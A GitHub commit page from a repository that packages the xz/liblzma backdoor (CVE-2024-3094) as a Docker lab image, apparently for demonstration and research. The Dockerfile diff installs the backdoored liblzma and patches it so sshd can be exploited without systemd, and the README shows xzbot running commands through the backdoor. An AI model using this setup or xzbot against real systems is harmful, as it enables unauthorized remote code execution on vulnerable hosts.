Remove systemd

rezigned · Apr 4, 2024 · fbb68f6 · fbb68f6
1 parent 17322b4
commit fbb68f6
Show file tree

Hide file tree

Showing 3 changed files with 18 additions and 14 deletions.
diff --git a/.github/demo.gif b/.github/demo.gif
diff --git a/Dockerfile b/Dockerfile
@@ -40,7 +40,7 @@ WORKDIR /build
 COPY --from=build /build/patch.py /build/assets/$XZ_LIB .
 
 RUN ARCH=$(uname -m | tr '_' '-'); \
-    apt-get update && apt-get install -y --no-install-recommends \
+    apt-get update && apt-get install -y --no-install-recommends --no-install-suggests \
     binutils-$ARCH-$PLATFORM_OS-gnu \
     cpp \
     && pip install pwntools \
@@ -68,20 +68,22 @@ ARG XZ_LIB
 ARG XZ_DEB
 ARG PLATFORM_CPU_ARCH
 ARG PLATFORM_OS
+# ENV DEBIAN_FRONTEND=noninteractive
 
 WORKDIR /build
 COPY debs/$XZ_DEB .
 COPY --from=build-patch /build/$XZ_LIB.patch .
 COPY --from=build-ssh-client /build/xzbot .
 
 RUN apt-get update && apt-get install -y --no-install-recommends --no-install-suggests \
-    systemd \
     openssh-server \
-    && dpkg -i ./$XZ_DEB \
-    && sed -i 's/#Port 22/Port 2222/' /etc/ssh/sshd_config \
     && rm -rf /var/lib/apt/lists/*
-
-# Patch liblzma before starting systemd
-RUN cp $XZ_LIB.patch /lib/$PLATFORM_CPU_ARCH-$PLATFORM_OS-gnu/$XZ_LIB
 
-CMD ["/lib/systemd/systemd"]
+# Install vulnerable version of liblzma and override it with patched version
+RUN dpkg -i ./$XZ_DEB \
+    && cp $XZ_LIB.patch /lib/$PLATFORM_CPU_ARCH-$PLATFORM_OS-gnu/$XZ_LIB \
+    && sed -i 's/#Port 22/Port 2222/' /etc/ssh/sshd_config \
+    && mkdir -p /var/run/sshd
+
+# The trick to the exploit works without "systemd" is to unset all envs except "LANG"
+CMD ["env", "-i", "LANG=en_US.UTF-8", "/usr/sbin/sshd", "-D"]
diff --git a/README.md b/README.md
@@ -8,7 +8,8 @@ The container image of [xz](https://tukaani.org/xz-backdoor/) backdoor ([CVE-202
 ![xz-backdoor demo](.github/demo.gif)
 
 ## Overview
-The container images are available on both Github ([ghcr.io/rezigned/xz-backdoor](https://github.com/rezigned/xz-backdoor/pkgs/container/xz-backdoor)) and Docker ([rezigned/xz-backdoor](https://hub.docker.com/r/rezigned/xz-backdoor)) registries.
+The `xz-backdoor` container images don't rely on `systemd` due to the fact that the exploit can be triggered with only just `sshd` if certain conditions are met.
+As a result, it allows us to start the container without `--privileged` flag which is considered insecure.
 
 ### Versions
 Both versions of the xz-backdoor are available as image tags.
@@ -26,20 +27,20 @@ Both versions of the xz-backdoor are available as image tags.
 ### Usage
 **1. Start the container image**
 
-> [!IMPORTANT]
-> The `--privileged` option is required in order to start `systemd` as PID 1.
+> [!TIP]
+> A specific version of liblzma can be specified via image tag e.g. `rezigned/xz-backdoor:5.6.0`.
 
 ```sh
 docker run --rm -it -d \
-  --privileged \
   --name xz-backdoor \
   --platform linux/amd64 \
-  rezigned/xz-backdoor:latest # or xz-backdoor:5.6.0
+  rezigned/xz-backdoor:latest
 ```
+
 **2. Run a command via `xzbot`**
 
 > [!NOTE]
-> The ourput of the default command (`id`) is redirected to `/tmp/.xz`.
+> The output of the default command (`id`) is redirected to `/tmp/.xz`.
 >
 > See https://github.com/amlweems/xzbot for more details.
 
@@ -55,3 +56,4 @@ docker exec -it `docker ps -f name=xz-backdoor -q` ./xzbot -cmd "uname -a > /tmp
 * https://edofic.com/posts/2021-09-12-podman-m1-amd64/
 * https://github.com/amlweems/xzbot
 * https://www.openwall.com/lists/oss-security/2024/03/29/4
+* https://github.com/LewisGaul/systemd-containers